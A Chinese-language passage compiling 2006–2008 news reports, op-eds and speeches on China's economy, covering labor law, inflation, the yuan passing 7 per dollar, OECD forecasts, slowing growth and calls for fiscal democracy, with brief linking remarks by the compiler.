相差不大。中国政府今年仍在陆续出台可增加人们消费能力的政策，如提高最低工资标准，继续扩大医疗保险和社会保障的覆盖范围，降低人们的医疗和养老负担等。Andrew Batson……………………下一轮中国经济调整可能漫长而痛苦            大      中      小 2008 年 03 月 17 日 13:23      《华尔街日报》中文网络版专稿徐斌花无常好，月无常圆，盛衰荣枯乃自然之道，经济发展也是如此。一轮经济周期通常要包含复苏、繁荣、调整、萧条几个阶段。自 2001 年以来的本轮经济周期目前仍处于繁荣阶段，但好日子终究有个头，不可能这么无休止地持续下去。尽管调整迟早要来，但经济调整也不可怕，不过是改正过去经济中所犯的一些错误而已，只要经济体系有足够的弹性，通常很快又会迎来新一轮经济繁荣周期。然而，此轮中国经济繁荣的周期结束后，相应的调整期将会很长很痛苦。其缘由就在于刚刚实行的《新劳动合同法》和即将出台的《工资条例》。温总理在政府工作报告中谈到收入分配改革的思路时，明确表示：“提高企业职工工资水平，建立企业职工工资正常增长和支付保障机制。推动企业建立工资集体协商制度……”。劳动和社会保障部副部长张小建近期在列席工商联界别联组会议后表示，由劳动保障部牵头制定的《工资条例》草案主体已完成，我国将把工资集体协商机制的政策通过法律化确定下来。如果《工资条例》通过，工资集体协商就会成为一种工资形成和增长的机制。由地域性的、行业性的工会和商会进行协商，确定工资水平。《新劳动合同法》实施的后果，其实不要等经济调整到来，现在就可以看得清楚──企业纷纷解聘临时工、招聘数量大幅缩水、企业招聘纷纷提高员工素质要求、中小企业纷纷关门歇业……。而《工资条例》所带来的恶果，却要等到经济调整来临才能看得见。这是因为目前经济繁荣形势下，企业有能力也有必要给员工加薪，工会插手员工薪资问题，只要不是太过分，劳资双方并无不便。但问题是经济形势一旦急转直下，涨上去的工资要想下来，因 “集体协商机制” 未必就那么容易了。按经济学语言来说，工资价格开始变得 “黏性”。劳动力是经济中最重要的生产要素，其价格一旦 “黏性”，经济系统就没有原来那么有弹性了。事实上，企业员工加薪从来都不需要什么 “集体协商机制”。自 2004 以来，珠三角和长三角普通工人最低工资上浮差不多一倍，这中间也没有看到哪家工会出头为农民工兄弟说话。老板不加薪的结果很简单：招不到工人！企业之间残酷竞争导致农民工薪水大涨，毋需政府劳心劳力。经济繁荣下，劳资之间薪酬体系灵活多变──年底花红、带薪休假、免费午餐外带考勤奖等等不一而足。企业要靠多种方式方可留住员工为其效力。如若不然，在 2006 年珠三角劳动力最紧张的时候，常有工厂员工因一个手机电话告知另外一家工厂月薪多出 50 元，就拍拍屁股走人！一旦经济调整，市道不景气，劳资双方不得不勒紧裤带一起过苦日子，奖金花红一律取消，带薪假期提也休提，诸般福利也化为乌有。工人虽然薪水大减，但总好过无米下锅。企业之间充分竞争就是保障员工加薪的最佳机制，因此只要政府打破垄断，降低行业准入门槛，对中国穷人而言，这就阿弥陀佛了。需求大增，价格自然大涨，需求大减，价格自然相应下调，无论如何，市场只要均衡，人们就会有活可干，分别不过青菜豆腐和大鱼大肉。现如今，工会代表政府要横插一竿子，市场均衡自然不存在，到时连青菜豆腐亦不可得。因为企业发现，无论裁员还是减薪都是很为难，那么要请一个工就是一个工，如无必要坚决不招人。即使经济逐渐复苏，企业招聘员工仍然小心翼翼，扩大再生产还是小步慢行，如无厚利就不开工──看看德法等劳动立法的欧盟国家连年高居不下的失业率、低迷不振的经济，自然就明白怎么回事了。需要指出的是，从新《劳动法》到《工资条例》等一系列信号，都显示出一种情景──政府与行会组织（如工会）将更多地干预市场要素的配置，一个自由度更小的市场环境正在扑面而来。表面上，这些立法的初衷是好的，也能带来政治上的得分，但对于未来中国经济与市场环境来说，情况可能会很糟糕。中国正在向市场经济转型，不客气地说，但这些法律和政策有可能颠覆现在的市场经济基础。这并不是在危言耸听。“通往地狱之路通常是由良好意愿铺就的”，阿克顿勋爵这句话套在《新劳动合同法》和即将出台的《工资条例》上最合适不过，这两个法案都严重损害了它们原本想保护人群的利益，非但如此，这两个法案很可能对中国经济造成无可挽回的损害，让原本富有弹性的经济体系从此变得僵硬而缺乏活力。（本文作者徐斌系安邦集团研究总部分析师，文中所述只代表他的个人观点。）……………………温家宝：6 月底前基本完成 “三定” 工作            大      中      小 2008 年 03 月 22 日 08:40      中国国务院总理温家宝周五称，中国将在 6 月底前基本完成新一届政府定职能、定机构、定编制的 “三定” 工作。温家宝是在主持召开新一届国务院第一次全体会议时发表上述讲话的，这是中国政府首次为政府机构改革方案制定时间表。全国人民代表大会于本月早些时候通过了《国务院机构改革方案》，内容包括组建五大部门，旨在提高宏观经济调控的效力，提高能源效率以及加强环境保护。相关报导? 温家宝第二任期面临巨大挑战? 国务院机构改革方案出台? 中国 “两会” 的老程式与新迹象温家宝将国务院机构改革方案作为本次会议的首要议程，与此同时，中国政府还要应对通货膨胀问题以及美国经济疲软可能拖累中国经济放缓的问题。温家宝在周二表示，实现今年全年消费者价格指数 (CPI) 增速目标（4.8% 左右）并不容易。在食品价格飙升推动下，中国今年 2 月份 CPI 上升了 8.7%。他在周五重申，政府将努力保持物价基本稳定，关键是千方百计地增加市场供应。他还表示，将依法实施对部分重要商品及服务的临时价格干预。中国政府年初实施了一些临时性措施，要求奶制品、猪肉、羊肉以及鸡蛋等部分食品的大型生产商在上调价格前必须先获得政府审批。广告温家宝在周五的讲话中称，政府将鼓励和引导农民扩大春播粮食和蔬菜等农作物面积，认真落实促进粮食、生猪和奶业发展的政策措施。他重申，政府将坚持控制投资过快增长，进一步控制高耗能、高排放行业新上扩能项目，严格执行项目建设程序和市场准入条件。温家宝表示，中国将保持对外贸易政策基本稳定。……………………中国经济增长初显放缓迹象            英      大      中      小 2008 年 04 月 02 日 11:16      中国快速发展的经济终于开始初显放缓迹象。工厂及基础设施投资支出一直以来都是中国经济增长的主要推动力，不过其增速现在已开始减弱。贷款申请获批变难，房地产开发商尤其感受到了政府从去年末开始实施的紧缩信贷措施的影响。由于原材料成本上升，一些公司利润下降，用于扩大再生产的资金也因此减少。中国政府一直在努力抑制投资过热和投机性泡沫，不过收效甚微。而现在，效果开始在市场上显露出来。房价在去年大幅上涨后开始企稳，上证综合指数也较去年 10 月高点下跌了 46%。正当世界经济前景越来越不明朗之际，中国政府试图让国内过热经济温和放缓的努力开始初见成效。随着美国经济的下滑，中国的出口增长已连续数月放缓，出口行业今年对中国整体经济增长的贡献可能也会较去年有所减弱。汇丰 (HSBC) 驻香港的经济学家屈宏斌表示，所有这些因素加在一起已开始对经济增长产生影响，我们已看到有迹象显示中小企业受到了严重冲击。今年中国前两个月的经济数据显示，对外经济和国内经济都有所放缓，中国出口增速近年来首次低于 20%。虽然经济增长的势头依然强劲，消费者支出等领域表现也不错，但经济数据仍凸显出今年第一季度的增长显著放缓。具体的放缓程度要到中国 4 月 17 日公布一季度国内生产总值 (GDP) 后方可知晓。屈宏斌说，关键问题在于公众将如何反应，有多少人认为这种放缓对于中国经济来说是件好事？广告鉴于美国经济的下滑，世界银行 (World Bank) 刚刚下调了对中国经济的预期，目前预计 2008 年全年增幅将降至 9.4%，比 2007 年整整低了两个百分点。当然，以其他任何经济体的标准来看，这个速度仍旧很快，但对于连续五年经济增长都超过两位数的中国来说，这仍算得上是一种调整。High Frequency Economics 驻美国首席经济学家卡尔? 温伯格 (Carl Weinberg) 本周在一份研究报告中指出，我们认为经济增幅降到一位数将会冲击市场，很可能会引发能源和工业大宗商品价格的下滑。今年早些时候中国经济放缓在一定程度上是因为运气不佳：今年 1 月末、2 月初，中国中部和南方大部分地区遭遇了严重的冰雪天气，导致交通中断、店铺停业、工厂停工。这将暂时抑制年初的经济增长，而且可能会使经济放缓看起来比实际趋势还要严重。早期有迹象显示 3 月份会出现某种反弹。不过在其他方面，中国经济的放缓幅度可能比官方数据显示的还要大。举例来说，今年前两个月，城镇固定资产投资这一资本支出的基准量度较去年同期增长了 24.3%，略低于去年 25.8% 的增幅。但国家统计局公布的这些数据没有经通货膨胀调整，而通货膨胀率一直在上升。排除通货膨胀因素后，今年前两个月投资较去年同期的增幅不超过 18%，相比之下，去年大部分时间这一增幅都在 23% 至 25% 之间。分析人士认为，这要归因于房地产市场的低迷以及出口型企业因美国需求下降而缩减了生产规模。原材料成本的上升也使很多公司的利润率下滑。国家统计局对工业企业的调查显示，今年前两个月的总利润仅较去年同期增长了 16.5%，明显低于 2007 年全年 36.7% 的增幅。上市公司中，轻、重工业的主要企业都受到了重挫。香港上市的纺织品和纱线生产商魏桥纺织股份有限公司 (Weiqiao Textile Co.) 本周公布的 2007 年净利润减少了 20%。该公司董事长张红霞将此归咎于美元走软、中国税收政策的转变以及原材料成本的上涨。宝山钢铁股份有限公司 (Baoshan Iron & Steel Co.) 近日公布的 2007 年净利润也出乎意料地下滑了 2.8%。为应对铁矿石和能源价格的上涨，这家中国最大的钢铁公司今年已经上调了很多产品的价格。经济放缓的这些初期征兆目前尚不足以令中国领导层放松抑制通货膨胀的努力。今年 2 月中国通货膨胀率达到 8.7%，创下十年多来的最高水平。中国央行 (PBOC) 对此作出反应，今年第一季度将人民币兑美元汇率推高了 4.1%，这是 2005 年中国取消钉住美元的政策之后人民币升值幅度最大的一次。中国央行周一在季度会议后发表的一份声明中指出，央行将继续实行 “从紧” 政策，并警告称通货膨胀压力依然很大，投资增长可能出现反弹。不过中国国务院总理温家宝也强调，他正密切关注世界经济的走势，中国政府已准备好在必要时迅速调整政策。去年中国政府的预算盈余超出预期，因此它有很多资源可以用来刺激经济增长。不少分析人士已经预计，今年晚些时候基础设施支出将大幅增加。温家宝上月曾指出，我们必须在经济发展和抑制通货膨胀之间找到一个平衡点。温家宝承诺今年将新增 1,000 万个城镇工作岗位。他说，我们必须保持一定的经济增速来缓解就业压力。Andrew Batson……………………美元兑人民币跌破 7 元大关2008 年 04 月 10 日 13:24人民币周四迎来重要里程碑，美元兑人民币十几年来首次跌破 7 元大关，北京方面也越来越乐于通过汇率反应出其日益增长的经济实力。上海市场交易开始时，中国央行 (PBOC) 将美元 / 人民币中间价定在人民币 6.9920 元，低于周三人民币 7.0017 元的收盘价。中国央行对外汇市场实行严格控制，美元兑人民币可以在央行制定的中间价上下波动 0.5%。相关报导? “汇率操纵论” 可以休矣? 汇率是多少其实不重要? 汇率工具缘何遭冷遇？? 中国央行将考虑进一步增强汇率弹性最近数月来，人民币一直在加速升值，继去年全年兑美元升值 7% 之后，今年迄今人民币兑美元又已升值 4.5%。北京工商大学世界经济研究中心主任季铸表示，从经济理论上讲，这是一种正常的趋势。他指出，中国经济增速达到了两位数，而美国经济却是处在放缓阶段。2005 年 7 月，在国内经济压力和国际呼声的双重推动下，中国政府放松了延用了十年之久的钉住美元的汇率机制，美元兑人民币汇率不再被限于 8.28 元。在汇改之初，人民币升值步伐缓慢，原因正是有关当局强调建立一个有效的汇率体系的重要性，并且毫不理会来自美国国会和其他贸易伙伴对华实施贸易制裁的威胁。由此，直到 2006 年 5 月，美元兑人民币汇率才突破了 8 元大关。如今，人民币升值被认为是对付中国日益严重的通货膨胀问题的一剂良药，因为通过升值能够降低原油等那些维持经济增长所需的重要进口商品的成本。不过，不断升值的人民币在中国国内也是个令人头疼的问题。升值的人民币让中国出口商品变得昂贵，特别是那些生产对价格敏感的商品的中国公司，它们自称受到了冲击。并且，经济学家和中国百姓也普遍认为人民币的估值依旧过低，在对人民币会进一步升值的预期推动下，人们对房地产等资产的投资热情丝毫不减，主要是因为投资者希望随着人民币的升值，这些资产的价值也会随之升高──即便其他因素表明资产价格已经偏高。尽管美国一直在向北京施压，要求人民币进一步升值，但华盛顿也在担心美元贬值可能会促使中国在眼下对美国经济至关重要的时刻不再买进美国国债。美国财政部长鲍尔森 (Henry Paulson) 不再威胁中国要采取制裁措施，而是开始尝试进行面对面的对话，以鼓励北京放松对汇率的管治。鲍尔森本月初访问中国的时候，有关美元兑人民币即将破 7 的传言甚嚣尘上。在与中国国家主席胡锦涛会面后，鲍尔森向记者称，我向胡锦涛主席表示，美方认可中国在人民币问题上取得了非常显着的进步，现在的人民币汇率更准确地反映了经济基本面因素。James T. Areddy……………………中国经济降温引发新争论2008 年 04 月 17 日 09:48中国官方最新公布的数字显示，热火朝天的中国经济今年第一季度增幅继续小幅减缓。面对日渐悲观的全球经济前景，中国经济逐渐减缓引发了人们对中国需要多快增长速度以及它能达到什么速度的讨论。中国国家统计局 (National Bureau of Statistics) 周三称，2008 年第一季度，中国国内生产总值 (GDP) 较上年同期增长了 10.6%，较最新修订后的 2007 年 11.9% 的增幅有所下降。出现减缓主要是由于贸易疲软以及今年年初的国内雪灾。同时，通货膨胀水平依然很高，国务院总理温家宝已经将抑制通胀列为政府经济工作的首要任务。3 月的消费物价指数 (CPI) 较上年同期增长 8.3%，比 2 月的 8.7% 略有回落。3 月的生产者价格指数较上年同期上涨 8%，2 月为 6.6%。第一季度的增长数字超出几乎所有经济学家的预测，它也减轻了国内要求政府停止抑制通胀、开始刺激经济的压力。国家统计局发言人李晓超在宣布最新数据时表示，政府的任务没有改变。他对记者说，当前宏观经济政策的主要任务仍然是防止物价继续上涨，但他表示，政府也会注意不要引起经济增长剧烈减缓。上述数据发布后，中国股市基准指数周三收盘跌 1.7%，持续的高通胀和相对较快的经济增长速度令投资者降低了政府会放宽政策的预期。股市收盘后，中国国务院进一步强调了这一点，称虽然全球经济环境错综复杂，但通胀仍是中国首要的经济问题。央行则上调了商业银行存款准备金率，从而减少了银行能用于贷款的资金，此举更是明确传达了上述信息。这些举措是政府自去年以来推行的一系列抑制通胀政策的一部分，这些政策包括让人民币升值、上调利率以及控制银行贷款等。在为高速增长带来的好处而欢欣鼓舞的同时，政府官员也承认，去年将近 12% 的增幅超乎想像，今年显然不可能延续这个速度。确定合适的增长速度更难。国内经济学家们多年来都认为 8%-9% 属于正常的增长速度，但现在开始将这个标准提高到 10% 左右。中国社会科学院 (Chinese Academy of Social Sciences) 去年预计全年增长率可能在 9.5%-10.7%。这一预测也符合 1978 年开始经济改革以来 9.8% 的年均增长率。鉴于这种势头，中国几乎不可能出现传统的衰退即经济活动减少的情况。但还是有人担心，全球经济减缓会导致中国的增长率低于其潜力所能达到的水平，也就是低于能创造足够工作机会的水平，这也是一些经济学家所谓的成长性衰退。北京中国建银投资证券有限责任公司 (China Jianyin Investment Securities) 经济学家李志坤说，对中国来说，低于 8% 的增长就可视为衰退。亚洲开发银行 (Asian Development Bank) 最近提出警告说，在最糟糕的情况下，即全球经济剧烈减缓、金融市场动荡加上国内高通胀，中国今年的增长速度可能下降到 7%。但即使放缓程度不这么剧烈，也会危及中国政府为其日渐膨胀的城市人口创造新的工作机会的目标。有关官员预计，每年需要新增 1,000 万个工作机会才能跟上劳动力的增长速度。据官方数据，过去 5 年中，GDP 每增长一个百分点只能产生约 850,000 个新工作机会。这意味着，政府如果想要达到其目标，就需要将年增长率保持在 11% 左右，或是想办法让较低的增长率创造更多的工作机会。亚洲开发银行驻北京经济学家庄建说，关键问题是，政府需要改善私营企业及中小企业的生存环境。这些企业应该能创造更多的工作机会。随着中国出口增长减缓，已经出现了关于部分制造商裁员及关闭工厂的报道。一些着名经济学家对此表示担心，他们要求政府刺激经济增长，以应对全球经济减缓的影响。中国《经济观察报》在最近的一篇社论中对失业率上升的社会影响发出警告，并提出首要任务应当是保持适度的经济增长，而非抑制通胀。温家宝表示，他希望在增长和控制通胀之间实现平衡，但他与有关官员一直难以说清到底怎样去实现。美林公司 (Merrill Lynch) 驻伦敦国际经济研究部主任亚历克斯? 帕特里斯 (Alex Patelis) 说：“他们矛盾重重。他们有许多目标，也想达成所有目标。但必须有所取舍。”Andrew Batson……………………OECD 预测中国 2008 年通胀上升 经济增长放缓            大      中      小 2008 年 06 月 05 日 07:34      经济合作与发展组织 (Organization for Economic Cooperation and Development, 简称 OECD) 周三上调了中国的通货膨胀预期，并表示，如果消费者价格指数 (CPI) 继续居高不下，中国经济增长放缓速度或快于预期。OECD 在最新发布的经济展望报告中表示，2008 年中国 CPI 升幅或在 6.1%，高于去年 12 月份时预计的 4.0%。中国 07 年 CPI 升幅为 4.8%。OECD 还下调了中国经济增长预期。该机构预计，中国 08 年 国内生产总值 (GDP) 增幅为 10%，此前的预期增幅为 10.7%。中国 07 年 GDP 增幅为 11.9%。OECD 称，高通货膨胀率持续时间愈长，通货膨胀预期面临升温的风险就愈大，进而使经济增长放缓幅度高于目前的预期。过去几个月，中国通货膨胀率居于历年来高点，令中国政府担心如无法缓解通货膨胀压力，或将导致经济和社会动荡。OECD 预计，09 年中国 GDP 增幅将进一步降至 9.5%，CPI 升幅则放缓至 4.2%。OECD 称，持续的通货膨胀压力以及流入中国的投机性外汇增加对中国经济向均衡增长有序过渡构成了威胁；均衡增长更多依靠国内需求推动，而对出口依赖较小。OECD 称，中国宏观经济政策应以减轻经济过热压力为目标；但 OECD 既未呼吁中国进一步加息，也未力促人民币汇率重估。OECD 表示，尽管人民币汇率一次性重估或为加息创造更大空间，并有助于缓解通货膨胀压力，但此举与中国政府抑制人民币升值的意愿相悖，并将使一些经济领域面临调整压力。广告OECD 称，中国利率已经高于美国，如果进一步加息，或将导致更多资金流入中国，使中国央行遏制资金流入的难度更大。OECD 表示，资金流入增加还导致流动性过剩加剧，从而加重通货膨胀压力。OECD 表示，中国推行的财政政策以及强劲的国内需求或将缓解因外部需求下降而带来的压力。该机构称，预计 08 年中国经常项目盈余在 GDP 中所占比例为 10%，低于 07 年的 10.8%。预计 2009 年经常项目盈余在 GDP 中所占比例将进一步下降至 9.5%。J.R. Wu……………………而中国国内，对中国经济各式各样的说辞也是琳琅满目。中国经济将被外资左右 可能连锁性破产2006 年 01 月 25 日 10:41【来源：新华网】新华网专稿：日本一家有影响的杂志，日前就中国经济在持续发展过程中存在的问题发表评论：中国经济在宏观上取得了成功和发展，但在微观上中国的民族企业发展开始达到了极限；中国企业只是关注使用外国技术，依靠低成本生产产品，而不是全力开发自主技术；中国企业之所以不能发挥独自性，这是因为中国现在的经济环境造成的。这家杂志告诫说，外资厂家从一开始就在中国市场扎满了根，发挥着技术和品牌的绝对优势，而中国企业只能通过效仿和低价格来与外资企业抗衡，除此之外别无他法。如果中国的民族企业在国内市场也被外资逼入困境，中国经济有可能被外资左右。日本《选择》月刊 1 月号刊登的这篇文章，题为《中国国家昌盛而民族工业走向衰亡》，“中国经济将被外资左右”本来 “改革、开放” 政策就是中国经济出现奇迹般增长的动力，而 “改革、开放” 的着眼点是 “引进外资、增加就业、扩大出口”。当初中国没有更深地考虑如何扶植以国有企业为主体的中国企业，以及如何加强它们的竞争力。战后，日本的前通产省把 “保护、扶植、加强民族产业及民族系统企业” 作为政策的头等大事，在材料、汽车、电脑、半导体等各领域限制外资，想方设法提出对日本厂家有利的政策。在这点上，日中有很大不同。如果中国的民族企业在国内市场也被外资逼入困境，中国经济有可能被外资左右。出口大国中国的出口中，60％都是外资企业的出口，这个事实反映了民族企业难以发展的中国经济的本质。2006 年中国官方媒体介绍，世界银行表示，中国贫富差距加大。世行驻中国首席经济学家郝福满表示，分析显示，在截至 2003 年的两年内，中国经济以每年接近 10％的速度增长，但 13 亿人口中最贫穷的 10％人群实际收入却下降了 2.4％，而同期最富有的 10％的人群收入增加 16％以上。大量生活在贫困线以下的人口受到收入冲击的影响 —— 他们只能依靠储蓄来维持消费。这些分析结果向中国政府缩小财富差距政策的基础提出了挑战。咨询公司 Dragonomics 的葛艺豪表示，世界银行的这一发现 “意义重大”，它表明 “水涨船高” 的观点错了。2006 年 12 月 18 日出版《瞭望新闻周刊》有标题为 “20 万亿 GDP 台阶上的中国” 的文字。入世五年，中国经济总量连上台阶，在全球经济排行榜上，中国 2003 年超有道理，2004 年超法国，2005 年超英国，目前已坐四望三；同时，出口总额也由 2001 年的 2661 亿美元，增至今年的 9600 亿美元左右，为入世前的 3.6 倍；外汇储备由 2001 年的 1050 亿美元增建了十倍，到今年突破了万亿美元大关，跃居世界第一。世界经济中的 “中国因素” 越来越受瞩目。同一期文字当中，也有时任国家发改委主任者的洋洋自得。马凯在全国发展和改革工作会议上指出，今年中国经济呈现速度较快、效益较好、物价较低、运行较稳、实惠较多、后劲较足的特点。不过，到现在，人们的看法早就没有那么乐观了。来自我收到的电子邮件的内容。梁京：温家宝的赌博当前的中国经济，与四川抗震救灾的形势颇有几分相似。地震形成的堰塞湖，高位积蓄了大量江水，对下游百余万人口构成严重威胁，而国际上居高不下的能源和粮食价格，则对全面处于价格低谷的中国经济，也构成了严重威胁。图为温家宝在唐家山堰塞湖坝上实地察看排险情况像许多关注中国经济的人一样，我一直在问自己一个问题：为什么温家宝不选择温和通胀兼加速人民币升值，使中国的物价水平平稳地接近国际水平，而选择了持续大量补贴进口石油和广泛实行物价管制的方针？这一方针对中国经济打击沉重，并导致中国在对外贸易中流失大量资源。有人估计，按照目前石油的内外差价，中国政府对进口石油的补贴，一年可达 600 至 800 亿美元；而由于出口产品价格扭曲导致的资源流失，将超过 1000 亿美元。从全球经济的角度，中国政府人为地压低国内能源和粮食价格，不仅意味着自己大出血，而且对降低全球的通胀并不利，因为中国的补贴一方面加大了对能源的需求，同时，由于限制粮食出口，还助长了全球食品价格的上涨。我现在的理解是，温家宝虽然低估了输入通胀的压力，但他拒绝温和通胀的选择绝非轻率之举。他的基本判断是，中国政治无法承受通胀风险，因此，宁可打击中国经济，宁可对外大出血，也不能冒通胀风险。温家宝比一些只知照搬西方教条的专家要高明，他知道中国穷人太多，又没有什么资产，他知道中国官员太腐败，很难在高通胀中有效对穷人实行大规模的收入补贴。因此，温家宝把赌注押在了美元早日回升，押在了国际石油和粮食价格早日回落。温家宝敢于这样去赌，还有两个重要原因，一是中国政府财力雄厚，另外一个就是政府对能源产业以及对粮食流通的垄断性控制。在必要的时候，比如年初南方的大雪灾，政府能够强制煤矿和电厂赔钱生产。这再一次证明，中国经济远不是真正的市场经济。不过，温家宝赌博的风险也不小，最大的风险来自于今年中国的粮食生产。中国政府可以强迫国有的石油公司赔钱进口石油，强迫煤矿和电厂赔钱生产，但是，无法强迫中国农民赔钱生产粮食。因此，如果今年中国粮食出现严重减产，如果出现农民惜售，温家宝的赌博可能给中国经济带来很大麻烦。温家宝的最大失误，很可能是他对中国的粮农太吝啬，舍不得大幅度提高政府收购价格。由于政府收购价格过低，再加上能源涨价导致化肥价格上升，许多农民大量减少化肥使用，一些地方的农民干脆决定不生产粮食。政府对这些不利于控制物价的消息进行封锁，所以，外界很难估计中国今年粮食的生产前景。温家宝对中国粮食供求平衡的信心，还建立在他相信政府库存充足。他认为，只要限制出口，中国不会出现粮食短缺。但是，中国粮食库存数据的可靠性，早已遭到舆论的置疑。政府的粮食营销机构，臭名昭著，一贯弄虚作假，在真正需要调粮的时候，能否调出来，国人并无信心。温家宝这样赌博对于缓解全球粮食危机也没有好处，其实，如果他大幅度提高政府收购粮食的价格，并适当增加出口，对中国，对世界都有好处，但温家宝却选择了保护主义的政策。这可能就是国际机构对中国政策不满的重要原因。温家宝的赌博如果输了，对中国和世界都不利，因此，我相信多数人都不希望看到他失败。但是，无论抗震救灾，还是应对输入性通胀，温家宝系天下安危于一身，他这样凭一人之决断赌下去，不免会失败。尽管如此，我还是不能回答这样一个问题，没有了温家宝，中国经济和世界经济究竟会变得更加安全，还是更加危险？因为我们完全无法预料，中国的黑箱政治，会把一个什么样的人，放在温家宝现在的位子上。……………………去年，还在商务部任职的太子党也信誓旦旦。薄熙来: 中国产品质量年底会有更大改观。商务部部长薄熙来表示，中国经济发展到今天，全民高度关注产品质量问题，中央政府对这个问题更是采取了全面的积极的措施，而且采取了经济、法律等诸多办法，我觉得这套组合拳打出去，到年底，我国的产品质量会有一个更大的改观。也是在去年，许峥给我发来了相关的内容。美阻挠中国在中亚找能源。哈萨克斯坦输往中国的石油计划于 5 月通过阿塔苏－阿拉山口石油管道进入中国新疆的独山子石化公司。由于中国经济的要害就是在能源储备上远远落后于西方发达国家，严重依赖石油进口，因此美国一直想给中国扩大石油进口制造更大的麻烦。美国外交人员开始加强对哈萨克斯坦的关注，美高官也开始对哈进行访问。对美国来说，哈萨克斯坦既是美国巩固其地区边缘政治的据点，也是能源资源一个重要来源，特别是在最近中东、非洲和南美一些国家动荡不安的局势下显得特别重要。5 月份，美副总统切尼访哈，他此行主要目的是敦促哈萨克斯坦和土库曼斯坦对输油管道的走向做出 “正确选择”。美国还计划将输向中国的石油转向西方国际市场。……………………中国超级富豪人数迅速增加，已达到 15 万人上海消息：中国超级富豪人数迅速增加，已经达到 15 万人。据路透社星期三报道，曾为福布斯财富榜首席调研员、现《胡润百富榜》发行人的胡润说，由于中国经济繁荣，富翁人数在迅速增加，个人财富超过 5 百万美元的超级富豪已有 15 万人，而且其财富还在日益增加；这使得奢侈品价格也随之增长，特别是豪华房产、游艇、高尔夫俱乐部会员资格、公司主管教育课程等。胡润还说，全中国有 50 人的个人资产超过 10 亿美元、2000 人超过 1 亿美元，3 万 5 千人超过 1 千万美元。……………………到了今年，中国经济遭遇到了前所未有的危险。国内民间研究机构对此目不转睛。◆ 【周小川：宏观政策着眼于避免经济大起大落】4 月 12 日，国际货币基金组织国际货币与金融委员会 (IMFC) 第十七届部长级会议在美国召开。央行行长周小川发言指出，中国经济在 2007 年继续保持平稳快速发展的基础上，2008 年一季度运行基本平稳，物价总水平和名义消费增长较快，固定资产投资依然保持较快增长，出口增速回落，贸易顺差呈下降趋势，总体经济形势良好。但中国经济仍存在投资增长过快、信贷投放过多等突出问题和深层次矛盾，通胀压力加大，外部环境不确定性上升。中国将继续推进经济结构调整，转变经济发展方式，实行稳健的财政政策和从紧的货币政策，努力防止经济增长由偏快转为过热，防止物价由结构性上涨演变为全面的通胀。同时密切跟踪分析新情况新问题，正确把握宏观调控的节奏、重点和力度，保持经济平稳较快发展，避免出现大的起落。……………………多才多艺的胡星斗也在殚精竭虑地为破解中国经济困局寻觅着良方。以民主财政扭转中国经济的失衡—— 在财政研讨会上的发言胡星斗我讲两点。第一点，以民主财政推动中国的民主进步，我认为民主财政可能是中国民主政治的一个突破口，也是民主政治的一个基础。所谓民主财政，就是公共财政的决策、资金的流向、使用的程序都应当是公开的，人民或者是其授权的代表可以进行监督，未经纳税人的同意征税都是非法的。纳税的标准、国家的财政预算和支出也必须经过纳税人代表的同意，公共财政的预算必须详细地列出各种开支，没有列入开支预算的项目，不能够开支，列支的钱不得挪作他用。但是中国的问题是，纳税只是公民的义务，纳税人缺乏了解税款的去向、用途的权利，纳税人财政公益诉讼制没有建立起来，各级人民代表大会对财政预算、决算的审查流于形式，预算也是编制粗糙、笼统，执行十分随意，可以说基本上是长官意志，没有强制性，也缺乏有效的问责、监督制，特别是每年每度都要召开人民代表大会，各级地方都要召开人民代表大会，实际上是官员代表大会，因为 70% 甚至 90% 的代表都是官员。每年召开人民代表大会要弄出一个非常完美的报告，各方面的意见都要征求到，但是这个报告有多少能够落实，就没有人追究，人民代表大会基本上都是浪费纳税人的钱，每一年召开，各级地方都要召开，但缺乏事后的监督。审计监督也是治标不治本。总之就是中国没有建立现代公共预算制度和现代公共财政制度。怎样建立民主财政，推动中国的民主政治呢？1、要借民主财政推动中国的权力制衡和监督，那就是像前面李教授和秋风所说的，强化人民代表大会的立法监督职能和财政预算决算的审批权，要追究超预算开支、非预算开支，改变预算开支项目上的责任。2、要通过民主财政推动代议制民意代表的产生，通过普选强化人民代表的代表性，减少官员代表的比例，杜绝纯荣誉代表的产生，实现人大代表的专职化和专业化，使他有时间、有能力审议政府的财政。3、推动审计和司法的独立性。4、推动财政公益诉讼制度的建立。也就是说任何纳税人都有权对浪费公共资金的现象，对违反财金制度的情况提起公益诉讼，代表全体纳税人或者部分纳税人提起公益诉讼，美国和日本都有这样的制度。5、通过民主财政推动中国的媒体监督，实行财政决策的公开。总之，通过民主财政推动中国的民主和进步。第二，以民主财政扭转中国经济的失衡。前两天我写了一篇关于中国经济失衡的文章。1、扭转经济分配机制的失衡。中国目前的财政收入估计今年要达到 5 万亿元，上半年就已经是 2.6 万亿，也就是说今年一年可能增加的财政收入就在 1.2 万亿，如果加上预算外、制度外的收费，总收入恐怕在 6、7 万亿，或者更高，政府不可谓不富，但是劳动者工资的总额占国内生产总值的比例只是 11%、 12%，而世界平均工资总额占 GDP 的比率是 40%、50%，中国只有百分之十几，可见，政府的富裕是以人民群众的贫困为代价的，中国收税越多，税收增长越多，人民就越贫困。因为中国目前的个人所得税 80% 来源于工薪阶层，增值税的 70% 来自于农民购买生产资料。中国的外汇储备世界第一，目前达到 1.3 万亿美元。但外汇储备越多、出口越多，对资源、环境、劳工身体的透支越多，人民就越贫困。二、扭转经济主体竞争的失衡。中国目前垄断的国企发达，而民营企业步履维艰。一方面是垄断的国企收入非常高，另一方面民营企业的税赋太重。中国的税收主要是向生产环节收税，民营企业如果不偷税漏税，80% 的民企会立马倒闭。所以，中国的民企大多规模小，重复建设，产品雷同，科技含量非常低，利润微薄，缺乏品牌，没有自己的销售渠道，特别是没有国外的销售渠道。这些就与对民营企业的收税太重直接相关。中国很多的垄断的国有企业进入了世界 500 强，这不是中国的幸事，而是中国的灾难。那么多的垄断国有企业进入了世界 500 强，北京的很多报纸讲，北京有多少企业进入亚洲 200 强，那都是垄断的国企，没有竞争力，可以说在很大程度上没有效率，浪费资源。进入世界 500 强的国企越多，人民的福利就会越少。三、扭转中国的经济资源利用的失衡。目前，中国各级政府的消费，三公消费，还有我说的四公消费，占财政支出 40% 以上，如果加上政党的开支，共青团、妇联、工会、民主党派的开支都算在其中，公务消费占财政支出的比例其实超过 